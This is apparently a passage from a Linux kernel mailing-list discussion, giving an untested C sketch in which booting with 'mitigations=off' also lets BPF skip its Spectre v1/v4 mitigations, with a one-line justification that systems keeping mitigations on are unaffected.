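/* Sketch: let "mitigations=off" also bypass the BPF Spectre v1/v4
 * mitigations, in addition to the existing CAP_PERFMON check.
 * Untested illustration of the idea discussed in this thread.
 */
#include <linux/cpu.h>		/* cpu_mitigations_off() */
#include <linux/capability.h>	/* perfmon_capable() */

static inline bool bpf_bypass_spec_v1(void)
{
	return cpu_mitigations_off() || perfmon_capable();
}

static inline bool bpf_bypass_spec_v4(void)
{
	return cpu_mitigations_off() || perfmon_capable();
}

That way nothing changes on systems that keep the mitigations enabled, while systems booted with "mitigations=off" get the unprivileged functionality back.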